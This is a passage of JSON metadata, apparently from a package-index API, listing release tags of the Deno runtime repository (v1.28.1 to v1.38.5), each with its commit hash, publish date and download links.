hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"